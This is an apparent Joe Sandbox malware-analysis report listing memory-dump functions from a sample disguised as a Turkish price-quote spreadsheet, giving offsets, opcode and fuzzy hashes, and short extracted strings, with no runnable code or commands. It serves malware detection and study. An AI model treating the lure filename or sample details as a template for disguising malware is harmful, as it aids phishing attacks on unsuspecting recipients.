Memory Dump Source

Source File: 00000003.00000002.4112546285.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5760000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7cfbe03335a2021c40ea865092c695440dfcc563343b30fd982c07969aa6eef0
Instruction ID: 84b9a879ab6e5066e9748be5ecf94e9edf0447ad5f212f4b7732b97709549937
Opcode Fuzzy Hash: 7cfbe03335a2021c40ea865092c695440dfcc563343b30fd982c07969aa6eef0
Instruction Fuzzy Hash: 53A1A275E012188FEB28CF6AC944B9EBBF2BF89300F14D0AAD449B7255DB305A85CF50

Function 0576A4C0 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4112546285.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5760000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a550a0059c2c4a08b06285d5a520e2c32a358c307de6f76959c0f93751728a37
Instruction ID: 798b7b443efb64ddd3ced7304f5297f2303109f94db30fd73bef48543c6d7c95
Opcode Fuzzy Hash: a550a0059c2c4a08b06285d5a520e2c32a358c307de6f76959c0f93751728a37
Instruction Fuzzy Hash: C9A19175E05218CFEB28CF6AD944B9EBAF2BB89300F14D0AAD409B7255DB305A85CF51

Function 0576B7B0 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4112546285.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5760000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2eb97dcf485615b409ea33fa7b561dfd0eab49f0e96afb26ce00b154b50905fc
Instruction ID: 79a355e187acd855f91619926742d1a275f4e74d17ceaabb413588694b356f59
Opcode Fuzzy Hash: 2eb97dcf485615b409ea33fa7b561dfd0eab49f0e96afb26ce00b154b50905fc
Instruction Fuzzy Hash: 18A1A275E052288FEB28CF6AC944B9DBAF2BF89300F14C0AAD40DB7255DB745A85CF50

Function 0576B160 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4112546285.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5760000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6b3070e94e36d2609dcf17db8b50776aea9f60f19ca14325e0bf7ea4e181ba7b
Instruction ID: db655007a17f2a47be1057d7bec554eefd1491d6ae903a727eab4b6798845ef6
Opcode Fuzzy Hash: 6b3070e94e36d2609dcf17db8b50776aea9f60f19ca14325e0bf7ea4e181ba7b
Instruction Fuzzy Hash: C4A19275E052188FEB28CF6AC944B9DBAF2BF89300F14D0AAD40DA7255DB305A85CF51

Function 057691E0 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4112546285.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5760000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b159840be5751808059d70cabe2e40dde9a018de22e578df0c4e0377376559aa
Instruction ID: 17d40af7304ec23ec5684aecbe231e9e1f222a63aa7258ec020248832fd43acd
Opcode Fuzzy Hash: b159840be5751808059d70cabe2e40dde9a018de22e578df0c4e0377376559aa
Instruction Fuzzy Hash: 5DA1A475E052188FEB68CF6AC944B9EBBF2BF89300F14C0AAD509B7255DB305A85CF51

Function 0576AB10 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4112546285.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5760000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d6e301576abaa6f3815c17a3ffc32e701ddf23ef47be5c3506110f2b5fe0d5b
Instruction ID: cbdc7028402d7b9e7b83543bb93c305dc12228b4bdd6307e1cc234f2fd783b60
Opcode Fuzzy Hash: 0d6e301576abaa6f3815c17a3ffc32e701ddf23ef47be5c3506110f2b5fe0d5b
Instruction Fuzzy Hash: F7A19275E05228CFEB28CF6AC944B9DBAF2BB89300F14C0AAD409B7255DB305A85CF50

Function 05769E78 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4112546285.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5760000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f653248cb8d9e5cedca0bda4637a93fdcf1ada4431f03f877e3d516b1b341297
Instruction ID: c37eebb0bbb08e29370d0dc2ba49232fd5ffa0e71e813158e2ab36b14a6e4f75
Opcode Fuzzy Hash: f653248cb8d9e5cedca0bda4637a93fdcf1ada4431f03f877e3d516b1b341297
Instruction Fuzzy Hash: C1A19075E01218CFEB28CF6AC944B9EBBF2BB89300F14D0AAD409B7255DB345A85CF50

Function 0576BE00 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4112546285.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5760000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52545fea59189ea841c82474042043dd010bb5677167885f4d6debde8ec71866
Instruction ID: 71180cd25c8f415866f3ccbafd6bf76d2aa264d0500ca1e49fa7313281193e10
Opcode Fuzzy Hash: 52545fea59189ea841c82474042043dd010bb5677167885f4d6debde8ec71866
Instruction Fuzzy Hash: 02A193B5E052188FEB18CF6AC944B9DBAF2BF89300F14D1AAD40DB7255DB345A85CF50

Function 05769830 Relevance: .2, Instructions: 218COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4112546285.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5760000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41ee119ba6082fee2b1da90f9311d88c91cc787b102d9df377908090aa05f2f8
Instruction ID: 65c4eb5c2b7a92cd8a52df5dda4667277072a4f7de7c5e0311341f5dd3644328
Opcode Fuzzy Hash: 41ee119ba6082fee2b1da90f9311d88c91cc787b102d9df377908090aa05f2f8
Instruction Fuzzy Hash: D2A1A175E052188FEB28CF6AC944B9EFAF2BF89300F14D0AAD509A7255DB345A85CF50

Function 0576BDF1 Relevance: .2, Instructions: 187COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4112546285.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5760000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d607f0ebcb8b4011bab1aa86dc4192a0866d658154d5ebf3e4d4f6cd496b31b1
Instruction ID: 6aa41db55883302cf91e8048ce782abdd58c1932a683e36f7e77c77a3ddb7431
Opcode Fuzzy Hash: d607f0ebcb8b4011bab1aa86dc4192a0866d658154d5ebf3e4d4f6cd496b31b1
Instruction Fuzzy Hash: 5191D7B1D05258CFEB28CF6AC944B99BBB2BF89300F14C0EAD40DAB255DB315A85DF51

Function 05769820 Relevance: .2, Instructions: 167COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4112546285.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5760000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f4166347ea603bca544dac6e85da376afd21079ef85e78f1c2db045f408ffc8
Instruction ID: f315ac0d9dbeb15fd07d5c72da3ede88ec00227f9cd44f086f703a7f886bed35
Opcode Fuzzy Hash: 6f4166347ea603bca544dac6e85da376afd21079ef85e78f1c2db045f408ffc8
Instruction Fuzzy Hash: E0719671E006188FEB68CF6AC944B9EFAF2AF89300F14C1AAD50DB7254DB345A85CF50

Function 05769E67 Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4112546285.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5760000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e5c0db291b4dba28982611976a35deef5eb1e1a4ab74c840a16986b744a32f16
Instruction ID: 7acbad6e45e955fa3ef995c7be296c4c8b15f36a37efe72911ee95a94bb66650
Opcode Fuzzy Hash: e5c0db291b4dba28982611976a35deef5eb1e1a4ab74c840a16986b744a32f16
Instruction Fuzzy Hash: 13719271E006288FEB68CF6AC944B99BBF2AF89300F14C0AAD50DB7255DB345A85CF51

Function 0576BDFB Relevance: .2, Instructions: 159COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4112546285.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5760000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c688ec1a61f32995c68590f19279192c04cdc8909478257c8fda5552a03020a7
Instruction ID: 18992f5b7cd6471c5adb3b5c5e453bb249701f06d80e17500b96660270e2ef35
Opcode Fuzzy Hash: c688ec1a61f32995c68590f19279192c04cdc8909478257c8fda5552a03020a7
Instruction Fuzzy Hash: 237185B1E006188FEB68CF6AC944B9DFAF2AF89300F14C1AAD50DB7255DB345A85CF51

Function 0576B150 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4112546285.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5760000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbaefb697f9cb3f9edfc2da7051f30350c80135759da1f5f3cfa77df7ba47997
Instruction ID: ac61ff15b758a462bbfbd46ef7a0407fc948d057494d70ed9a3ac7b4abe692bc
Opcode Fuzzy Hash: cbaefb697f9cb3f9edfc2da7051f30350c80135759da1f5f3cfa77df7ba47997
Instruction Fuzzy Hash: C851C6B1D056589FEB18CF6AC844799BBB2BFCA300F14C0EAD40CAB265DB310A85DF51

Function 05767900 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4112546285.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5760000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 305d2a33b1ed505c637d30a4050195615adecff1cc5c55d5bf9740eae2df85d8
Instruction ID: d3497909909071713e3b2b924966d40ed98c4a46b8310645219afea634701221
Opcode Fuzzy Hash: 305d2a33b1ed505c637d30a4050195615adecff1cc5c55d5bf9740eae2df85d8
Instruction Fuzzy Hash: 5141D1B0E006088BEB18DFAAD9447DEBBF2BF88304F14C56AC418BB294DB755945CF64

Function 0576C438 Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4112546285.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5760000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e26f906218ee57a035bbaeed2175366c9984f3ff77c6b7bd89a7168a00468ce
Instruction ID: 5edf6d51394959684e029248b1f647c94e48affff84d4503198dca034945fe24
Opcode Fuzzy Hash: 5e26f906218ee57a035bbaeed2175366c9984f3ff77c6b7bd89a7168a00468ce
Instruction Fuzzy Hash: CF418B71D016188BEB58CF6BCD44799FAF3BFC9300F14C1AAC50CA6264DB340A858F51

Function 057691CF Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4112546285.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5760000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 755e38347ef813b6a891eaf80bd6896e07f7e54d004f3f4f2553cac77df0c5cc
Instruction ID: 4bd95664ec3836b16d995ef7a4de109eeebbd3e1f99e84cb0cbb6be58516d0ce
Opcode Fuzzy Hash: 755e38347ef813b6a891eaf80bd6896e07f7e54d004f3f4f2553cac77df0c5cc
Instruction Fuzzy Hash: 6F416BB1E016188BEB58CF6BCD457DAFAF3AFC9310F14C1AAD50CA6264DB740A858F51

Function 0576AB03 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4112546285.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5760000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b40e7be426b4c4292cb854383d3bcb22a9ce3cfe86436ee429595ac2bf8ebe41
Instruction ID: 12f7fe5b380be641f4d9ba70a52cbbcb1e0dd5e274aa5fe4df224ab166088630
Opcode Fuzzy Hash: b40e7be426b4c4292cb854383d3bcb22a9ce3cfe86436ee429595ac2bf8ebe41
Instruction Fuzzy Hash: 2A4169B1E016188BEB58CF6BCD4578AFAF3AFC9300F04C1AAC50CA6264DB740A858F51

Function 0576B7A0 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4112546285.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5760000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 601ce19387e02e3f6344e4a57145aa72b7544204d0f691bc7f45f4b1d93c8e08
Instruction ID: 7e5f2ec522ba198ac3e575cbe5590b1fc4444d020ca31c761c8bc51edf66cb35
Opcode Fuzzy Hash: 601ce19387e02e3f6344e4a57145aa72b7544204d0f691bc7f45f4b1d93c8e08
Instruction Fuzzy Hash: 4B4158B1E016188BEB58CF6BCD457CAFAF3AFC9310F04C1AAD50CA6264DB740A858F55

Function 0576A4B3 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4112546285.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5760000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46738dd73ba4c881b6772aa7c5ebe3813bb9171be11a354e3225d812a733cde4
Instruction ID: e656c5989575bee1d76500f3e1c83001635af8eacac233d7dba97ca07cfe0527
Opcode Fuzzy Hash: 46738dd73ba4c881b6772aa7c5ebe3813bb9171be11a354e3225d812a733cde4
Instruction Fuzzy Hash: B04158B1E016188BEB58CF6BCD4578AFAF3AFC9300F14C1AAC50CA6264DB744A85CF51

Function 01186E58 Relevance: 10.5, Strings: 8, Instructions: 477COMMON

Download Yara Rule

Strings

(odq, xrefs: 01187367
(odq, xrefs: 01186E96
(odq, xrefs: 01186F51
(odq, xrefs: 01186F7D
,hq, xrefs: 011872F8
,hq, xrefs: 01187308
(odq, xrefs: 0118701A
(odq, xrefs: 01187377

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID: (odq$(odq$(odq$(odq$(odq$(odq$,hq$,hq
API String ID: 0-1376594924
Opcode ID: 533da2b86984ce9cad9092ab7e3a15a251e9dea8b72d79389e848170b643e82c
Instruction ID: 7cb0d161986a2b0328d32270f333d6d577f26b118b0bb48460e2f91c3e440c86
Opcode Fuzzy Hash: 533da2b86984ce9cad9092ab7e3a15a251e9dea8b72d79389e848170b643e82c
Instruction Fuzzy Hash: 85125C70A002098FCB19EF69D984A9EBBF2FF89314F258559E905DB2A1DB30ED41CF51

Function 011877F0 Relevance: 3.2, Strings: 2, Instructions: 697COMMON

Download Yara Rule

Strings

$dq, xrefs: 01188314
$dq, xrefs: 01188337

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID: $dq$$dq
API String ID: 0-2340669324
Opcode ID: a463cfdf0c4a2917454375ea30dbf18eee10560e569e3b1b1765716596d6ed9e
Instruction ID: 2e8cddd0f4fdb9958d1b2e01a27647b7248e2c62dceb2a573a97a9690dd71071
Opcode Fuzzy Hash: a463cfdf0c4a2917454375ea30dbf18eee10560e569e3b1b1765716596d6ed9e
Instruction Fuzzy Hash: 3B52EF74A102188FEB149BE4C850B9EBB72FF89300F1091A9D50A7B365DF359E85DF61

Function 011887E9 Relevance: 2.8, Strings: 2, Instructions: 332COMMON

Download Yara Rule

Strings

4'dq, xrefs: 01188837
4'dq, xrefs: 01188811

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID: 4'dq$4'dq
API String ID: 0-2306408947
Opcode ID: 8e50f5cc74d987157c9ba432b945dd60cd5e06131183c992c5a295f8f01b6d3f
Instruction ID: 201a61dbcd1b2bd4f52a6be8083aed909231116f7c316f97410dc31b05e029f2
Opcode Fuzzy Hash: 8e50f5cc74d987157c9ba432b945dd60cd5e06131183c992c5a295f8f01b6d3f
Instruction Fuzzy Hash: FCB184B03145018FEB1DAB2CC994B397A9AEFC5705F55846AE602CF3A1EB24DC42CF42

Function 011856A8 Relevance: 2.8, Strings: 2, Instructions: 265COMMON

Download Yara Rule

Strings

Hhq, xrefs: 01185793
Hhq, xrefs: 011857C6

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID: Hhq$Hhq
API String ID: 0-2450388649
Opcode ID: 5ad1f7166b05b751cce54f5b6379609723e447997d63d0e89e9a230fbc396442
Instruction ID: 67b550cc20c829717842a205bf9e3c7139a26d900dd78c3099b17a7ec040c14b
Opcode Fuzzy Hash: 5ad1f7166b05b751cce54f5b6379609723e447997d63d0e89e9a230fbc396442
Instruction Fuzzy Hash: 0A91BB307002548FDB6AAF78D898A6E7BE3FF89304F148469E546CB295DB749C42CB91

Function 01185C08 Relevance: 2.7, Strings: 2, Instructions: 230COMMON

Download Yara Rule

Strings

,hq, xrefs: 01185CE8
,hq, xrefs: 01185CDE

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID: ,hq$,hq
API String ID: 0-3475114797
Opcode ID: e46ca213f24b52acadaf85984e5b0e5b88424609d9ed970871eb78f48d436256
Instruction ID: 1a426a8598faa5c4788f36d17c0866534e6f3c86354682b921325b67168cd599
Opcode Fuzzy Hash: e46ca213f24b52acadaf85984e5b0e5b88424609d9ed970871eb78f48d436256
Instruction Fuzzy Hash: 85816F35A001158FCB9CEF6DC8889AEBBB7FF89210B15C569D9059B3A1D731E842CF51

Function 05768818 Relevance: 2.7, Strings: 2, Instructions: 210COMMON

Download Yara Rule

Strings

(hq, xrefs: 057689F2
(&dq, xrefs: 05768933

Memory Dump Source

Source File: 00000003.00000002.4112546285.0000000005760000.00000040.00000800.00020000.00000000.sdmp, Offset: 05760000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_5760000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID: (&dq$(hq
API String ID: 0-215397407
Opcode ID: 75fd4c8dedf5d40a4b3833abc9820ac486dd2c9e1c460f771322cfca2e4c09e2
Instruction ID: 26a3baf4dc02b0773a0ea156aabc718b516045f0642019b48135527425c5b576
Opcode Fuzzy Hash: 75fd4c8dedf5d40a4b3833abc9820ac486dd2c9e1c460f771322cfca2e4c09e2
Instruction Fuzzy Hash: D6717F35F002595BDB15DFB9C8546AEBBF2AF89700F148429E806BB381DF349D46C792

Function 01183428 Relevance: 2.6, Strings: 2, Instructions: 112COMMON

Download Yara Rule

Strings

Xhq, xrefs: 0118345E
Xhq, xrefs: 01183435

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID: Xhq$Xhq
API String ID: 0-635196136
Opcode ID: f1a369833dfc7c596fe1b1abd15f709b7513ddfda751271b46ca2ce9a14cad2c
Instruction ID: 748d80cf7971a894c7fe3eaaa22c6d4db9b31c298093a057f34ba1d5fb2afdc6
Opcode Fuzzy Hash: f1a369833dfc7c596fe1b1abd15f709b7513ddfda751271b46ca2ce9a14cad2c
Instruction Fuzzy Hash: 3831D775B203248BDF1D69BE999427EB6DABBC4A10F1C8439E926D3380DF74CC458B61

Function 01180C9F Relevance: 1.6, Strings: 1, Instructions: 395COMMON

Download Yara Rule

Strings

LRdq, xrefs: 01180E5E

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID: LRdq
API String ID: 0-3106745678
Opcode ID: 4d78d7b64a72e17db88241805259ad4c81601941e9d7c03fa9bc9bb10d42678c
Instruction ID: ec96a807ca3a01332272f671c4b693dec472a845f83c54253b4f6bdb4426f916
Opcode Fuzzy Hash: 4d78d7b64a72e17db88241805259ad4c81601941e9d7c03fa9bc9bb10d42678c
Instruction Fuzzy Hash: F7229674A10219CFCBA4EF64E894B9DBBB6FF58301F1086A9E419A7368DB345D85CF40

Function 01180CA0 Relevance: 1.6, Strings: 1, Instructions: 395COMMON

Download Yara Rule

Strings

LRdq, xrefs: 01180E5E

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID: LRdq
API String ID: 0-3106745678
Opcode ID: 9605b843d6bbd8c1a7c505bb4f5ce6183d46472f84bcad3d255c554375466c89
Instruction ID: 2d383423d6936f8981d8331d40aadcebf6a9e40ca395e0e49c0cb3528af79f0a
Opcode Fuzzy Hash: 9605b843d6bbd8c1a7c505bb4f5ce6183d46472f84bcad3d255c554375466c89
Instruction Fuzzy Hash: EB229674A10219CFCBA4EF64E894B9DBBB6FF58301F1086A9E419A7368DB345D85CF40

Function 0118A650 Relevance: 1.4, Strings: 1, Instructions: 124COMMON

Download Yara Rule

Strings

(odq, xrefs: 0118A7D9

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID: (odq
API String ID: 0-567950297
Opcode ID: 8e1ec5d58f1d47b3e9c191f1e0762e3739986817d32a92bd31b7d8b777d1e4b1
Instruction ID: c941c8ea2dfc465d2418ef29d9479d3cd35897b220a50b145293581b681cbe92
Opcode Fuzzy Hash: 8e1ec5d58f1d47b3e9c191f1e0762e3739986817d32a92bd31b7d8b777d1e4b1
Instruction Fuzzy Hash: BD41C2357002089FCB18AF79E894AAE7BF6AFC9310F148479E616D7391DE319C02CB95

Function 01181F61 Relevance: 1.3, Strings: 1, Instructions: 56COMMON

Download Yara Rule

Strings

T, xrefs: 01181F6C

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID: T
API String ID: 0-286829874
Opcode ID: 5451dd094b9567a5ef3f94855eedc5e03abaf778fbd7f2d479124fbd3eb12f5a
Instruction ID: 0bad7534e36ab444351062fbbfda82ee23ad95d24466a9beca21e80559d1ae46
Opcode Fuzzy Hash: 5451dd094b9567a5ef3f94855eedc5e03abaf778fbd7f2d479124fbd3eb12f5a
Instruction Fuzzy Hash: 2C21CFB4C042098FCB45EFB8D9855EEBFF5FB09300F10516AD819B3264EB305A89CBA1

Function 0118A818 Relevance: .4, Instructions: 412COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b4d4b3ad3fa5c962579a1627c6cc259afa6e5190ce67f7fac3d6eba7ba27116e
Instruction ID: fb395b39e8f637a42ad4852ffe13ce1b5aaa9550a0aed0b6213e31ca5c388918
Opcode Fuzzy Hash: b4d4b3ad3fa5c962579a1627c6cc259afa6e5190ce67f7fac3d6eba7ba27116e
Instruction Fuzzy Hash: 6AF12A75A006148FCB08DFACD98499DBBF6BF88310B1AC46AE515AB361DB35EC81CF50

Function 01187438 Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64219900f44eac3f9a353a2d0517f73007671d76864dfe2f062f2460f8658105
Instruction ID: 5661fea43d76fe6f6df9763bd09b20c1b1da0bccacaf43d5f7649c36da0e113f
Opcode Fuzzy Hash: 64219900f44eac3f9a353a2d0517f73007671d76864dfe2f062f2460f8658105
Instruction Fuzzy Hash: 92712C347002458FDB19EF2CC498AAD7BE5AF49604F2580A9E912CB3B1DB71DC41CFA1

Function 0118CEC7 Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.4109016829.0000000001180000.00000040.00000800.00020000.00000000.sdmp, Offset: 01180000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1180000_ABH projesi_SLG6%0190%_fiyat teklif - PO240017 xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5269a60be9007b77f07c77323c15a4458a97aaf8e3282bb18dc0d4059d90baa0
